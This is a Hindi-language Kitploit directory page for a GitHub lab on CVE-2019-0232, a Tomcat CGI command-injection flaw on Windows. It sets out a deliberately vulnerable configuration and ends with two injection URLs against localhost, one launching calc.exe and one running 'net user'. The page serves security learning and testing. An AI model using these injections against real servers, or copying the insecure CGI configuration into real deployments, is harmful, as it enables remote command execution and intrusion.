Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-0232 — CVE-2019-0232 का शोषण करने के लिए चरण-दर-चरण प्रयोगशाला वातावरण, जो एक Tomcat CGI कमांड इंजेक्शन भेद्यता है, जिसमें सेटअप निर्देश और पेलोड उदाहरण शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/xsxtw/cve-2019-0232
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubxsxtw/cve-2019-0232

CVE-2019-0232

CVE-2019-0232 का शोषण करने के लिए चरण-दर-चरण प्रयोगशाला वातावरण, जो एक Tomcat CGI कमांड इंजेक्शन भेद्यता है, जिसमें सेटअप निर्देश और पेलोड उदाहरण शामिल हैं।

रिपॉजिटरी देखें
492 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

भेद्यता वातावरण

root@kitploit:~
Tomcat 8.5.39

Jdk 8u121

web.xml फ़ाइल संपादित करें

root@kitploit:~
<servlet>
        <servlet-name>cgi</servlet-name>
        <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
        <init-param>
          <param-name>debug</param-name>
          <param-value>0</param-value>
        </init-param>
        <init-param>
          <param-name>cgiPathPrefix</param-name>
          <param-value>WEB-INF/cgi-bin</param-value>
        </init-param>
        <init-param>
          <param-name>executable</param-name>
          <param-value></param-value>
        </init-param>
         <load-on-startup>5</load-on-startup>
</servlet> 

<!-- The mapping for the CGI Gateway servlet -->

    <servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
    </servlet-mapping>

फ़ाइल संपादित करें

content.xml
root@kitploit:~
<Context privileged="true">

    <!-- Default set of monitored resources. If one of these changes, the    -->
    <!-- web application will be reloaded.                                   -->
    <WatchedResource>WEB-INF/web.xml</WatchedResource>
    <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>

    <!-- Uncomment this to disable session persistence across Tomcat restarts -->
    <!--
    <Manager pathname="" />
    -->
</Context>

hello.bat फ़ाइल बनाएँ

root@kitploit:~
echo Content-type: text/html     //whatever the content in batch file

निर्देशिका WEB-INF को $CATALINA_HOME/webapps/ROOT पर ले जाएँ और फिर टॉमकैट सर्वर को पुनरारंभ करें

विंडोज ओएस कमांड इंजेक्शन के साथ लक्ष्य टॉमकैट सर्वर पर अनुरोध भेजें

root@kitploit:~
http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Ccalc.exe

http://localhost:8080/cgi-bin/hello.bat?&net+user
टूल डाउनलोड करें